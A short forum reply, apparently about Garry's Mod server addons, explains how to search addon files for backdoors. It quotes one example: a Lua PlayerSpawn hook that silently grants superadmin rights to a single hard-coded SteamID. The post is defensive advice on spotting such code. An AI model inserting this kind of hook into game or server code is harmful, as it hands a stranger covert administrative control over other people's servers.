In most archive editors, you get an option to search for keywords, most backdoors involves giving someone superadmin or admins permissions so you should look for scripts like:
Code:
function sbDRP( ply ) if ( ply:SteamID() == "STEAM_1:0:143352462" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "sbDRP", sbDRP
Otherwise, you can use tools like the guys from above said, be careful!